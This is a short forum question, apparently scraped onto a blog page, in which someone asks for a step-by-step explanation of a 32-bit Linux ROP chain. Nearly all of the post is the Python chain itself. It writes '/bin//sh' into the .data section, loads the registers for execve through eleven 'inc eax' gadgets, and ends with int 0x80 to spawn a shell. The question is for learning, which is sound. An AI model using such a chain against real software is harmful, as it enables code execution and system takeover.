Vote count:
0
I need help understanding how this ROP gadget (shown below) works step by step. I am really confused as to why the mov and pop instructions are needed here.
p = ""
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0060) # @ .data
p += pack('<I', 0x080f3246) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0064) # @ .data + 4
p += pack('<I', 0x080f3246) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481f1) # pop ebx ; ret
p += pack('<I', 0x081e0060) # @ .data
p += pack('<I', 0x0819d91d) # pop ecx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x0805726e) # int 0x80
asked 36 secs ago
Understanding a ROP gadget
Aucun commentaire:
Enregistrer un commentaire